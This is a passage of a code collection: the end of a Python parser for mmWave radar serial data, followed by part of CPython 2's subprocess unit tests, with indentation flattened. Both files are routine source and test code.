verbose = c['_settings_']['verbose']
if c['dfeDataOutputMode']['type'] is None:
c['dfeDataOutputMode']['type'] = 1 # legacy (no subframes)
if c['adcCfg']['adcBits'] is None:
c['adcCfg']['adcBits'] = 2 # 16 bit
log_lin_scale = 1.0 / 512
if num_tx_elev_antenna(c) == 1: log_lin_scale = log_lin_scale * 4.0 / 3 # MMWSDK-439
fft_scale_comp_1d = fft_doppler_scale_compensation(32, num_range_bin(c))
fft_scale_comp_2d = 1;
fft_scale_comp = fft_scale_comp_2d * fft_scale_comp_1d
p['log_lin'], p['fft_comp'], p['range_bias'] = log_lin_scale, fft_scale_comp, c['_settings_']['rangeBias']
c.pop('_settings_', None) # remove entry
return c, p
def _proc_(cfg, par, err={1: 'miss', 2: 'exec', 3: 'plot'}):
global apps
for _, app in apps.items(): app.kill()
apps.clear()
for cmd, app in _meta_['app'].items():
if type(app) not in (list, tuple): app = (app,)
for item in app:
if cmd in cfg['guiMonitor'] and cfg['guiMonitor'][cmd] == 1 and item is not None:
if item not in apps:
apps[item], values = exec_app(item, (cfg, par, ))
if values is None: values = []
code = apps[item].poll()
if code is None:
print_log(item, values)
tapp = threading.Thread(target=_grab_, args=(item,))
tapp.start()
else:
print_log(item, values, RuntimeError(err[code]))
def _pipe_(dat):
for tag in apps:
if apps[tag] is None: continue
try:
apps[tag].stdin.write(str.encode(dat + '\n'))
apps[tag].stdin.flush()
except Exception as e:
print_log(e, sys._getframe(), tag)
apps[tag].kill()
apps[tag] = None
def _grab_(tag):
try:
while True:
line = apps[tag].stderr.readline()
if line:
line = line.decode('latin-1')
print_log(None, tag, line.strip())
except:
pass
# ------------------------------------------------
def _data_(prt): # observe auxiliary port and process incoming data
if not prt.timeout:
raise TypeError('no timeout for serial port provided')
input, output, sync, size = {'buffer': b''}, {}, False, _meta_['blk']
while True:
try:
data = prt.read(size)
input['buffer'] += data
if data[:len(_meta_['seq'])] == _meta_['seq']: # check for magic sequence
if len(output) > 0:
plain = json.dumps(output)
_pipe_(plain)
if verbose:
print(plain, file=sys.stdout, flush=True) # just print output to stdout
input['buffer'] = data
input['blocks'] = -1
input['address'] = 0
input['values'] = 0
input['other'] = {}
output = {}
sync = True # very first frame in the stream was seen
if sync:
flen = 0
while flen < len(input['buffer']): # keep things finite
flen = len(input['buffer'])
aux_buffer(input, output) # do processing of captured bytes
except serial.serialutil.SerialException:
return # leave thread
except Exception as e:
print_log(e, sys._getframe())
# ------------------------------------------------
def aux_buffer(input, output, head=40, indices={
1: 'detected_points', 2: 'range_profile', 3: 'noise_profile',
4: 'azimuth_static', 5: 'range_doppler', 6: 'stats', 7: 'side_info'}):
def aux_head(dat, n=head):
m = dat[ 0: 8] # magic
v = intify(dat[ 8:12], 10) # version
l = intify(dat[12:16]) # length
d = intify(dat[16:20], 10) # platform
f = intify(dat[20:24]) # frame number
t = intify(dat[24:28]) # cpu cycles
o = intify(dat[28:32]) # num objects
s = intify(dat[32:36]) # segements
u = intify(dat[36: n]) # subframe
return n, v, l, d, f, t, o, s, u
def aux_struct(dat, n=8):
t = intify(dat[ 0: 4])
l = intify(dat[ 4: n])
return n, t, l // 2
def aux_object(dat, oth, n=16): # detected points/objects
x = intify(dat[ 0: 4])
y = intify(dat[ 4: 8])
z = intify(dat[ 8:12])
p = intify(dat[12: n])
if x > 32767: x -= 65536
if y > 32767: y -= 65536
if z > 32767: z -= 65536
qfrac = 0
if 'qfrac' in oth: qfrac = oth['qfrac'] # q-notation is used
x = q_to_dec(x, qfrac)
y = q_to_dec(y, qfrac)
z = q_to_dec(z, qfrac)
return n, p, x, y, z
def aux_profile(dat, n=2): # value of range or noise profile
v = intify(dat[ 0: n])
return n, v
def aux_heatmap(dat, sgn, n=2): # value for heatmaps
v = intify(dat[ 0: n])
if sgn and v > 32767: v -= 65536
return n, v
def aux_info(dat, n=24): # performance measures and statistical data
ifpt = intify(dat[ 0: 4])
tot = intify(dat[ 4: 8])
ifpm = intify(dat[ 8:12])
icpm = intify(dat[12:16])
afpl = intify(dat[16:20])
ifpl = intify(dat[20: n])
return n, ifpt, tot, ifpm, icpm, afpl, ifpl
# ----------
buffer, blocks, address, values, other = \
input['buffer'], input['blocks'], input['address'], input['values'], input['other']
def progress(n, block, value):
nonlocal buffer, values, address
buffer = buffer[n:]
values -= 1
if values == 0: address = 0
try:
output[block].append(value)
except:
try:
output[block][value[0]] = value[1]
except:
output[block] = value
# ----------
# 7) point cloud side info
while address == 7 and len(buffer) >= 4 and values > 0:
buffer = buffer[4:] # TODO
values -= 1
if values == 0: address = 0
# 6) statistics (raw values)
if address == 6 and len(buffer) >= 24 and values > 0:
n, ifpt, tot, ifpm, icpm, afpl, ifpl = aux_info(buffer)
progress(n, indices[address], {
'interframe_processing': ifpt,
'transmit_output': tot,
'processing_margin': {
'interframe': ifpm,
'interchirp': icpm},
'cpu_load': {
'active_frame': afpl,
'interframe': ifpl}
})
# 5) range-doppler heatmap: entire, 2D, log mag range/Doppler array
while address == 5 and len(buffer) >= 2 and values > 0:
n, v = aux_heatmap(buffer, False)
progress(n, indices[address], v)
# 4) range-azimuth heatmap: azimuth data from the radar cube matrix
while address == 4 and len(buffer) >= 2 and values > 0:
n, v = aux_heatmap(buffer, True)
progress(n, indices[address], v)
# 3) 1D array of data considered “noise”
while address == 3 and len(buffer) >= 2 and values > 0:
n, v = aux_profile(buffer)
progress(n, indices[address], q_to_db(v))
# 2) 1D array of log mag range ffts – i.e. the first column of the log mag range-Doppler matrix
while address == 2 and len(buffer) >= 2 and values > 0:
n, v = aux_profile(buffer)
progress(n, indices[address], q_to_db(v))
# 1) point cloud
while address == 1 and len(buffer) >= 16 and values > 0:
buffer = buffer[16:] # TODO
values -= 1
if values == 0: address = 0
# ----------
# 0b) segment
if len(buffer) >= 8 and blocks > 0 and address == 0:
n, address, values = aux_struct(buffer)
buffer = buffer[n:]
blocks -= 1
if address in (1, 7):
values = output['header']['objects']
output[indices[address]] = {}
elif address in (2, 3, 4, 5):
output[indices[address]] = []
elif address in (6, ):
output[indices[address]] = None
# 0a) header
if len(buffer) >= head and blocks == -1 and address == 0 and values == 0:
n, v, l, d, f, t, o, s, u = aux_head(buffer)
buffer = buffer[n:]
blocks = s
output['header'] = {'version': v, 'length': l, 'platform': d, 'number': f, 'time': t, 'objects': o, 'blocks': s, 'subframe': u}
# ----------
input['buffer'] = buffer
input['blocks'] = blocks
input['address'] = address
input['values'] = values
input['other'] = other
|
test_subprocess.py
|
import unittest
from test import test_support
import subprocess
import sys
import signal
import os
import errno
import tempfile
import time
import re
import sysconfig
try:
import resource
except ImportError:
resource = None
try:
import threading
except ImportError:
threading = None
mswindows = (sys.platform == "win32")
#
# Depends on the following external programs: Python
#
if mswindows:
SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
'os.O_BINARY);')
else:
SETBINARY = ''
class BaseTestCase(unittest.TestCase):
def setUp(self):
# Try to minimize the number of children we have so this test
# doesn't crash on some buildbots (Alphas in particular).
test_support.reap_children()
def tearDown(self):
for inst in subprocess._active:
inst.wait()
subprocess._cleanup()
self.assertFalse(subprocess._active, "subprocess._active not empty")
def assertStderrEqual(self, stderr, expected, msg=None):
# In a debug build, stuff like "[6580 refs]" is printed to stderr at
# shutdown time. That frustrates tests trying to check stderr produced
# from a spawned Python process.
actual = re.sub(r"\[\d+ refs\]\r?\n?$", "", stderr)
self.assertEqual(actual, expected, msg)
class PopenTestException(Exception):
pass
class PopenExecuteChildRaises(subprocess.Popen):
"""Popen subclass for testing cleanup of subprocess.PIPE filehandles when
_execute_child fails.
"""
def _execute_child(self, *args, **kwargs):
raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_call_seq(self):
# call() function with sequence argument
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(rc, 47)
def test_check_call_zero(self):
# check_call() function with zero return code
rc = subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(0)"])
self.assertEqual(rc, 0)
def test_check_call_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(c.exception.returncode, 47)
def test_check_output(self):
# check_output() function with zero return code
output = subprocess.check_output(
[sys.executable, "-c", "print 'BDFL'"])
self.assertIn('BDFL', output)
def test_check_output_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_output(
[sys.executable, "-c", "import sys; sys.exit(5)"])
self.assertEqual(c.exception.returncode, 5)
def test_check_output_stderr(self):
# check_output() function stderr redirected to stdout
output = subprocess.check_output(
[sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
stderr=subprocess.STDOUT)
self.assertIn('BDFL', output)
def test_check_output_stdout_arg(self):
# check_output() function stderr redirected to stdout
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print 'will not be run'"],
stdout=sys.stdout)
self.fail("Expected ValueError when stdout arg supplied.")
self.assertIn('stdout', c.exception.args[0])
def test_call_kwargs(self):
# call() function with keyword args
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
rc = subprocess.call([sys.executable, "-c",
'import sys, os;'
'sys.exit(os.getenv("FRUIT")=="banana")'],
env=newenv)
self.assertEqual(rc, 1)
def test_invalid_args(self):
# Popen() called with invalid arguments should raise TypeError
# but Popen.__del__ should not complain (issue #12085)
with test_support.captured_stderr() as s:
self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
argcount = subprocess.Popen.__init__.__code__.co_argcount
too_many_args = [0] * (argcount + 1)
self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
self.assertEqual(s.getvalue(), '')
def test_stdin_none(self):
# .stdin is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print "banana"'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
p.wait()
self.assertEqual(p.stdin, None)
def test_stdout_none(self):
# .stdout is None when not redirected, and the child's stdout will
# be inherited from the parent. In order to test this we run a
# subprocess in a subprocess:
# this_test
# \-- subprocess created by this test (parent)
# \-- subprocess created by the parent subprocess (child)
# The parent doesn't specify stdout, so the child will use the
# parent's stdout. This test checks that the message printed by the
# child goes to the parent stdout. The parent also checks that the
# child's stdout is None. See #11963.
code = ('import sys; from subprocess import Popen, PIPE;'
'p = Popen([sys.executable, "-c", "print \'test_stdout_none\'"],'
' stdin=PIPE, stderr=PIPE);'
'p.wait(); assert p.stdout is None;')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), 'test_stdout_none')
def test_stderr_none(self):
# .stderr is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print "banana"'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stdin.close)
p.wait()
self.assertEqual(p.stderr, None)
def test_executable_with_cwd(self):
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(["somethingyoudonthave", "-c",
"import sys; sys.exit(47)"],
executable=sys.executable, cwd=python_dir)
p.wait()
self.assertEqual(p.returncode, 47)
@unittest.skipIf(sysconfig.is_python_build(),
"need an installed Python. See #7774")
def test_executable_without_cwd(self):
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
p = subprocess.Popen(["somethingyoudonthave", "-c",
"import sys; sys.exit(47)"],
executable=sys.executable)
p.wait()
self.assertEqual(p.returncode, 47)
def test_stdin_pipe(self):
# stdin redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.stdin.write("pear")
p.stdin.close()
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_filedes(self):
# stdin is set to open file descriptor
tf = tempfile.TemporaryFile()
d = tf.fileno()
os.write(d, "pear")
os.lseek(d, 0, 0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=d)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_fileobj(self):
# stdin is set to open file object
tf = tempfile.TemporaryFile()
tf.write("pear")
tf.seek(0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=tf)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdout_pipe(self):
# stdout redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read(), "orange")
def test_stdout_filedes(self):
# stdout is set to open file descriptor
tf = tempfile.TemporaryFile()
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), "orange")
def test_stdout_fileobj(self):
# stdout is set to open file object
tf = tempfile.TemporaryFile()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), "orange")
def test_stderr_pipe(self):
# stderr redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=subprocess.PIPE)
self.addCleanup(p.stderr.close)
self.assertStderrEqual(p.stderr.read(), "strawberry")
def test_stderr_filedes(self):
# stderr is set to open file descriptor
tf = tempfile.TemporaryFile()
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=d)
p.wait()
os.lseek(d, 0, 0)
self.assertStderrEqual(os.read(d, 1024), "strawberry")
def test_stderr_fileobj(self):
# stderr is set to open file object
tf = tempfile.TemporaryFile()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), "strawberry")
def test_stderr_redirect_with_no_stdout_redirect(self):
# test stderr=STDOUT while stdout=None (not set)
# - grandchild prints to stderr
# - child redirects grandchild's stderr to its stdout
# - the parent should get grandchild's stderr in child's stdout
p = subprocess.Popen([sys.executable, "-c",
'import sys, subprocess;'
'rc = subprocess.call([sys.executable, "-c",'
' "import sys;"'
' "sys.stderr.write(\'42\')"],'
' stderr=subprocess.STDOUT);'
'sys.exit(rc)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
#NOTE: stdout should get stderr from grandchild
self.assertStderrEqual(stdout, b'42')
self.assertStderrEqual(stderr, b'') # should be empty
self.assertEqual(p.returncode, 0)
def test_stdout_stderr_pipe(self):
# capture stdout and stderr to the same pipe
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
self.addCleanup(p.stdout.close)
self.assertStderrEqual(p.stdout.read(), "appleorange")
def test_stdout_stderr_file(self):
# capture stdout and stderr to the same open file
tf = tempfile.TemporaryFile()
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=tf,
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), "appleorange")
def test_stdout_filedes_of_stdout(self):
# stdout is set to 1 (#1531862).
# To avoid printing the text on stdout, we do something similar to
# test_stdout_none (see above). The parent subprocess calls the child
# subprocess passing stdout=1, and this test uses stdout=PIPE in
# order to capture and check the output of the parent. See #11963.
code = ('import sys, subprocess; '
'rc = subprocess.call([sys.executable, "-c", '
' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
'\'test with stdout=1\'))"], stdout=1); '
'assert rc == 18')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), 'test with stdout=1')
def test_cwd(self):
tmpdir = tempfile.gettempdir()
# We cannot use os.path.realpath to canonicalize the path,
# since it doesn't expand Tru64 {memb} strings. See bug 1063571.
cwd = os.getcwd()
os.chdir(tmpdir)
tmpdir = os.getcwd()
os.chdir(cwd)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getcwd())'],
stdout=subprocess.PIPE,
cwd=tmpdir)
self.addCleanup(p.stdout.close)
normcase = os.path.normcase
self.assertEqual(normcase(p.stdout.read()), normcase(tmpdir))
def test_env(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "orange"
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read(), "orange")
def test_communicate_stdin(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.communicate("pear")
self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("pineapple")'],
stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, "pineapple")
self.assertEqual(stderr, None)
def test_communicate_stderr(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("pineapple")'],
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertStderrEqual(stderr, "pineapple")
def test_communicate(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
(stdout, stderr) = p.communicate("banana")
self.assertEqual(stdout, "banana")
self.assertStderrEqual(stderr, "pineapple")
# This test is Linux specific for simplicity to at least have
# some coverage. It is not a platform specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
fd_directory = '/proc/%d/fd' % os.getpid()
num_fds_before_popen = len(os.listdir(fd_directory))
p = subprocess.Popen([sys.executable, "-c", "print('')"],
stdout=subprocess.PIPE)
p.communicate()
num_fds_after_communicate = len(os.listdir(fd_directory))
del p
num_fds_after_destruction = len(os.listdir(fd_directory))
self.assertEqual(num_fds_before_popen, num_fds_after_destruction)
self.assertEqual(num_fds_before_popen, num_fds_after_communicate)
def test_communicate_returns(self):
# communicate() should return None if no redirection is active
p = subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(47)"])
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, None)
def test_communicate_pipe_buf(self):
# communicate() with writes larger than pipe_buf
# This test will probably deadlock rather than fail, if
# communicate() does not work properly.
x, y = os.pipe()
if mswindows:
pipe_buf = 512
else:
pipe_buf = os.fpathconf(x, "PC_PIPE_BUF")
os.close(x)
os.close(y)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read(47));'
'sys.stderr.write("xyz"*%d);'
'sys.stdout.write(sys.stdin.read())' % pipe_buf],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
string_to_write = "abc"*pipe_buf
(stdout, stderr) = p.communicate(string_to_write)
self.assertEqual(stdout, string_to_write)
def test_writes_before_communicate(self):
# stdin.write before communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.stdin.write("banana")
(stdout, stderr) = p.communicate("split")
self.assertEqual(stdout, "bananasplit")
self.assertStderrEqual(stderr, "")
def test_universal_newlines(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'sys.stdout.write("line1\\n");'
'sys.stdout.flush();'
'sys.stdout.write("line2\\r");'
'sys.stdout.flush();'
'sys.stdout.write("line3\\r\\n");'
'sys.stdout.flush();'
'sys.stdout.write("line4\\r");'
'sys.stdout.flush();'
'sys.stdout.write("\\nline5");'
'sys.stdout.flush();'
'sys.stdout.write("\\nline6");'],
stdout=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
stdout = p.stdout.read()
if hasattr(file, 'newlines'):
# Interpreter with universal newline support
self.assertEqual(stdout,
"line1\nline2\nline3\nline4\nline5\nline6")
else:
# Interpreter without universal newline support
self.assertEqual(stdout,
"line1\nline2\rline3\r\nline4\r\nline5\nline6")
def test_universal_newlines_communicate(self):
# universal newlines through communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'sys.stdout.write("line1\\n");'
'sys.stdout.flush();'
'sys.stdout.write("line2\\r");'
'sys.stdout.flush();'
'sys.stdout.write("line3\\r\\n");'
'sys.stdout.flush();'
'sys.stdout.write("line4\\r");'
'sys.stdout.flush();'
'sys.stdout.write("\\nline5");'
'sys.stdout.flush();'
'sys.stdout.write("\\nline6");'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate()
if hasattr(file, 'newlines'):
# Interpreter with universal newline support
self.assertEqual(stdout,
"line1\nline2\nline3\nline4\nline5\nline6")
else:
# Interpreter without universal newline support
self.assertEqual(stdout,
"line1\nline2\rline3\r\nline4\r\nline5\nline6")
def test_no_leaking(self):
# Make sure we leak no resources
if not mswindows:
max_handles = 1026 # too much for most UNIX systems
else:
max_handles = 2050 # too much for (at least some) Windows setups
handles = []
try:
for i in range(max_handles):
try:
handles.append(os.open(test_support.TESTFN,
os.O_WRONLY | os.O_CREAT))
except OSError as e:
if e.errno != errno.EMFILE:
raise
break
else:
self.skipTest("failed to reach the file descriptor limit "
"(tried %d)" % max_handles)
# Close a couple of them (should be enough for a subprocess)
for i in range(10):
os.close(handles.pop())
# Loop creating some subprocesses. If one of them leaks some fds,
# the next loop iteration will fail by reaching the max fd limit.
for i in range(15):
p = subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write(sys.stdin.read())"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
data = p.communicate(b"lime")[0]
self.assertEqual(data, b"lime")
finally:
for h in handles:
os.close(h)
test_support.unlink(test_support.TESTFN)
def test_list2cmdline(self):
self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']),
'"a b c" d e')
self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']),
'ab\\"c \\ d')
self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']),
'ab\\"c " \\\\" d')
self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']),
'a\\\\\\b "de fg" h')
self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']),
'a\\\\\\"b c d')
self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']),
'"a\\\\b c" d e')
self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']),
'"a\\\\b\\ c" d e')
self.assertEqual(subprocess.list2cmdline(['ab', '']),
'ab ""')
def test_poll(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(1)"])
count = 0
while p.poll() is None:
time.sleep(0.1)
count += 1
# We expect that the poll loop probably went around about 10 times,
# but, based on system scheduling we can't control, it's possible
# poll() never returned None. It "should be" very rare that it
# didn't go around at least twice.
self.assertGreaterEqual(count, 2)
# Subsequent invocations should just return the returncode
self.assertEqual(p.poll(), 0)
def test_wait(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(2)"])
self.assertEqual(p.wait(), 0)
# Subsequent invocations should just return the returncode
self.assertEqual(p.wait(), 0)
def test_invalid_bufsize(self):
# an invalid type of the bufsize argument should raise
# TypeError.
with self.assertRaises(TypeError):
subprocess.Popen([sys.executable, "-c", "pass"], "orange")
def test_leaking_fds_on_error(self):
# see bug #5179: Popen leaks file descriptors to PIPEs if
# the child fails to execute; this will eventually exhaust
# the maximum number of open fds. 1024 seems a very common
# value for that limit, but Windows has 2048, so we loop
# 1024 times (each call leaked two fds).
for i in range(1024):
# Windows raises IOError. Others raise OSError.
with self.assertRaises(EnvironmentError) as c:
subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# ignore errors that indicate the command was not found
if c.exception.errno not in (errno.ENOENT, errno.EACCES):
raise c.exception
@unittest.skipIf(threading is None, "threading required")
def test_double_close_on_error(self):
# Issue #18851
fds = []
def open_fds():
for i in range(20):
fds.extend(os.pipe())
time.sleep(0.001)
t = threading.Thread(target=open_fds)
t.start()
try:
with self.assertRaises(EnvironmentError):
subprocess.Popen(['nonexisting_i_hope'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
t.join()
exc = None
for fd in fds:
# If a double close occurred, some of those fds will
# already have been closed by mistake, and os.close()
# here will raise.
try:
os.close(fd)
except OSError as e:
exc = e
if exc is not None:
raise exc
def test_handles_closed_on_exception(self):
# If CreateProcess exits with an error, ensure the
# duplicate output handles are released
ifhandle, ifname = tempfile.mkstemp()
ofhandle, ofname = tempfile.mkstemp()
efhandle, efname = tempfile.mkstemp()
try:
subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle,
stderr=efhandle)
except OSError:
os.close(ifhandle)
os.remove(ifname)
os.close(ofhandle)
os.remove(ofname)
os.close(efhandle)
os.remove(efname)
self.assertFalse(os.path.exists(ifname))
self.assertFalse(os.path.exists(ofname))
self.assertFalse(os.path.exists(efname))
def test_communicate_epipe(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.communicate("x" * 2**20)
def test_communicate_epipe_only_stdin(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
time.sleep(2)
p.communicate("x" * 2**20)
# This test is Linux-ish specific for simplicity to at least have
# some coverage. It is not a platform specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
def test_failed_child_execute_fd_leak(self):
"""Test for the fork() failure fd leak reported in issue16327."""
fd_directory = '/proc/%d/fd' % os.getpid()
fds_before_popen = os.listdir(fd_directory)
with self.assertRaises(PopenTestException):
PopenExecuteChildRaises(
[sys.executable, '-c', 'pass'], stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# NOTE: This test doesn't verify that the real _execute_child
# does not close the file descriptors itself on the way out
# during an exception. Code inspection has confirmed that.
fds_after_exception = os.listdir(fd_directory)
self.assertEqual(fds_before_popen, fds_after_exception)
# context manager
class _SuppressCoreFiles(object):
"""Try to prevent core files from being created."""
old_limit = None
def __enter__(self):
"""Try to save previous ulimit, then set it to (0, 0)."""
if resource is not None:
try:
self.old_limit = resource.getrlimit(resource.RLIMIT_CORE)
resource.setrlimit(resource.RLIMIT_CORE, (0, 0))
except (ValueError, resource.error):
pass
if sys.platform == 'darwin':
# Check if the 'Crash Reporter' on OSX was configured
# in 'Developer' mode and warn that it will get triggered
# when it is.
#
# This assumes that this context manager is used in tests
# that might trigger the next manager.
value = subprocess.Popen(['/usr/bin/defaults', 'read',
'com.apple.CrashReporter', 'DialogType'],
stdout=subprocess.PIPE).communicate()[0]
if value.strip() == b'developer':
print "this tests triggers the Crash Reporter, that is intentional"
sys.stdout.flush()
def __exit__(self, *args):
"""Return core file behavior to default."""
if self.old_limit is None:
return
if resource is not None:
try:
resource.setrlimit(resource.RLIMIT_CORE, self.old_limit)
except (ValueError, resource.error):
pass
@unittest.skipUnless(hasattr(signal, 'SIGALRM'),
"Requires signal.SIGALRM")
def test_communicate_eintr(self):
# Issue #12493: communicate() should handle EINTR
def handler(signum, frame):
pass
old_handler = signal.signal(signal.SIGALRM, handler)
self.addCleanup(signal.signal, signal.SIGALRM, old_handler)
# the process is running for 2 seconds
args = [sys.executable, "-c", 'import time; time.sleep(2)']
for stream in ('stdout', 'stderr'):
kw = {stream: subprocess.PIPE}
with subprocess.Popen(args, **kw) as process:
signal.alarm(1)
# communicate() will be interrupted by SIGALRM
process.communicate()
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
def test_exceptions(self):
# caught & re-raised exceptions
with self.assertRaises(OSError) as c:
p = subprocess.Popen([sys.executable, "-c", ""],
cwd="/this/path/does/not/exist")
# The attribute child_traceback should contain "os.chdir" somewhere.
